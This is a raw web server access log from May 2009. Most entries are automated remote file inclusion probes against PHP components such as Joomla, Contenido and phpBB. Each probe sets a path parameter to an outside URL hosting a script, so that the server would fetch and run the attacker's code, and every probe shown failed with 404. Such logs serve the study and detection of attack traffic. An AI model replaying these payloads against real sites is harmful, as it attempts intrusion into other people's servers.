65.98.80.2 - - [29/May/2009:04:07:51 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:07:56 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:07:58 -0400] "GET /logs/access_log.Q109050700%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:08:16 -0400] "GET /logs/error_log.Q108051600/port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:08:16 -0400] "GET /logs/port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:08:16 -0400] "GET /port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:08:28 -0400] "GET /logs/access_log.Q109050700%20%20//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:08:46 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:08:46 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:08:46 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:08:50 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:09:14 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:09:14 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
195.139.235.30 - - [29/May/2009:04:09:21 -0400] "GET /logs/access_log.Q108121900 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
212.116.219.52 - - [29/May/2009:04:09:23 -0400] "GET /logs/access_log.Q108121900 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
203.151.233.72 - - [29/May/2009:04:09:36 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:09:36 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:09:36 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
74.6.8.108 - - [29/May/2009:04:09:47 -0400] "GET /images/_notes/nav_store_search_off_r1_c3.jpg.mno HTTP/1.0" 200 210 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [29/May/2009:04:09:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.151.233.72 - - [29/May/2009:04:09:54 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:09:57 -0400] "GET /port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:09:57 -0400] "GET /logs/port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:09:57 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:09:57 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:04:10:15 -0400] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:04:10:15 -0400] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:04:10:15 -0400] "GET /logs/access_log.Q109050300%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:10:25 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:10:25 -0400] "GET /logs/access_log.Q109051700%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:10:42 -0400] "GET /logs/access_log.Q108021800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.87.152.58 - - [29/May/2009:04:10:49 -0400] "GET /logs/error_log.Q109051200//include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:04:10:49 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
70.87.152.58 - - [29/May/2009:04:10:49 -0400] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:04:11:06 -0400] "GET /logs/access_log.Q108072800/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:11:17 -0400] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:11:17 -0400] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.249.36.194 - - [29/May/2009:04:11:17 -0400] "GET /logs/access_log.Q109051500//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.125.64.38 - - [29/May/2009:04:11:55 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:04:11:56 -0400] "GET /logs/error_log.Q108051600%20%20/port.php?content=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:12:26 -0400] "GET /logs/error_log.Q108122800//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
216.221.10.116 - - [29/May/2009:04:12:34 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 288 "-" "Mozilla/5.0"
121.173.130.41 - - [29/May/2009:04:12:41 -0400] "GET /logs/access_log.Q109050700//newspublish/include.php?path%5Bdocroot%5D=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
75.125.245.26 - - [29/May/2009:04:13:04 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
75.125.245.26 - - [29/May/2009:04:13:04 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.jspipesanddrums.com/photos/footer.gif?? HTTP/1.1" 404 240 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
221.139.104.104 - - [29/May/2009:04:13:07 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:13:08 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:13:08 -0400] "GET /logs/access_log.Q108072400%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
65.98.80.2 - - [29/May/2009:04:13:25 -0400] "GET /logs/access_log.Q109050700//mambots/content/multithumb/mainbody.php?mosConfig_absolute_path=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:13:46 -0400] "GET /logs/access_log.Q108072400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.12 - - [29/May/2009:04:13:59 -0400] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
77.221.130.12 - - [29/May/2009:04:13:59 -0400] "GET /logs/error_log.Q109042900///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
77.221.130.12 - - [29/May/2009:04:13:59 -0400] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
211.233.22.209 - - [29/May/2009:04:13:59 -0400] "GET /logs/error_log.Q109042900/index.php?DOCUMENT_ROOT=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
211.233.22.209 - - [29/May/2009:04:13:59 -0400] "GET /index.php?DOCUMENT_ROOT=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
221.139.104.104 - - [29/May/2009:04:13:59 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.233.22.209 - - [29/May/2009:04:14:00 -0400] "GET /logs/index.php?DOCUMENT_ROOT=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
216.221.10.116 - - [29/May/2009:04:14:08 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.12 - - [29/May/2009:04:14:10 -0400] "GET /logs/access_log.Q109050300///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.melhoreseremdois.com//plugins/Help01.txt??? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
65.98.80.2 - - [29/May/2009:04:14:10 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.romeral.cl/fx29id.txt???? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
123.125.64.49 - - [29/May/2009:04:14:15 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.151.233.72 - - [29/May/2009:04:14:15 -0400] "GET /logs/access_log.Q108021800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:14:23 -0400] "GET /logs/access_log.Q108072800%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
66.70.14.90 - - [29/May/2009:04:14:23 -0400] "GET /logs/errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
66.70.14.90 - - [29/May/2009:04:14:23 -0400] "GET /errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.70.14.90 - - [29/May/2009:04:14:23 -0400] "GET /logs/access_log.Q108081500%20%20/errors.php?error=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:04:14:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.249.36.194 - - [29/May/2009:04:15:39 -0400] "GET /logs/access_log.Q109050300//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.239.227.229 - - [29/May/2009:04:15:56 -0400] "GET /logs/access_log.Q109051500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
222.239.227.229 - - [29/May/2009:04:15:56 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
222.239.227.229 - - [29/May/2009:04:15:57 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.kolo1976.com/joomla/mambots/echo.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.246.20.221 - - [29/May/2009:04:16:05 -0400] "GET /logs/access_log.Q109050700///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
218.246.20.221 - - [29/May/2009:04:16:07 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.233.22.209 - - [29/May/2009:04:16:26 -0400] "GET /logs/error_log.Q108100300/index.php?DOCUMENT_ROOT=http://www.tmt.org.ru/readme.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
123.125.64.51 - - [29/May/2009:04:16:36 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.142.148.142 - - [29/May/2009:04:16:37 -0400] "GET /logs/access_log.Q109052200///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.142.148.142 - - [29/May/2009:04:16:37 -0400] "GET /logs///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:16:42 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:16:42 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:16:48 -0400] "GET /logs/access_log.Q109021500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:04:17:32 -0400] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
94.23.200.54 - - [29/May/2009:04:17:32 -0400] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/crime_core08/fx29id.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:18:41 -0400] "GET /logs/access_log.Q109052300//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:18:44 -0400] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.gayawater.co.kr/technote/..../id.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
220.79.47.122 - - [29/May/2009:04:18:49 -0400] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.gayawater.co.kr/technote/..../id.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
72.18.148.82 - - [29/May/2009:04:19:04 -0400] "GET /logs/access_log.Q109021500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:19:22 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:19:22 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:19:23 -0400] "GET /logs/access_log.Q108121900%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
209.59.12.99 - - [29/May/2009:04:19:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.142.148.142 - - [29/May/2009:04:20:30 -0400] "GET /logs/access_log.Q109050700///modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:20:42 -0400] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:20:42 -0400] "GET /logs/access_log.Q109051800/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:20:42 -0400] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
220.79.47.122 - - [29/May/2009:04:20:52 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://raic.kunsan.ac.kr/bbs//include/uiu.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:22 -0400] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:22 -0400] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:22 -0400] "GET /logs/access_log.Q109051500%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:31 -0400] "GET /logs/access_log.Q109052100%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 290 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:45 -0400] "GET /solpot.html?body=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.18.148.82 - - [29/May/2009:04:22:45 -0400] "GET /logs/solpot.html?body=http://pacificdecor.org/vnc/fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:22:47 -0400] "GET /logs/error_log.Q108110100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:22:47 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:22:47 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
69.94.125.100 - - [29/May/2009:04:23:12 -0400] "GET /logs/access_log.Q109050300//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:23:16 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:23:16 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:23:31 -0400] "GET /logs/access_log.Q108121900/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
221.139.104.104 - - [29/May/2009:04:23:39 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dwno.or.kr/bbs/config/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:23:55 -0400] "GET /logs/access_log.Q109021500/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
66.249.68.17 - - [29/May/2009:04:24:29 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.17 - - [29/May/2009:04:24:29 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L002A9F3F0F618600BFB0003+WSEQ(S0060):1+OUITEM(A0200):45415201 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [29/May/2009:04:24:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
70.87.152.58 - - [29/May/2009:04:24:54 -0400] "GET //include/print_category.php?setup[use_category]=1&dir=http://chr.es.kr/02.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
203.151.233.72 - - [29/May/2009:04:25:45 -0400] "GET /logs/error_log.Q108110100%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
203.151.233.72 - - [29/May/2009:04:26:16 -0400] "GET /logs/access_log.Q109021500%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.festzim.com/gks/tcl/FX29ID.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
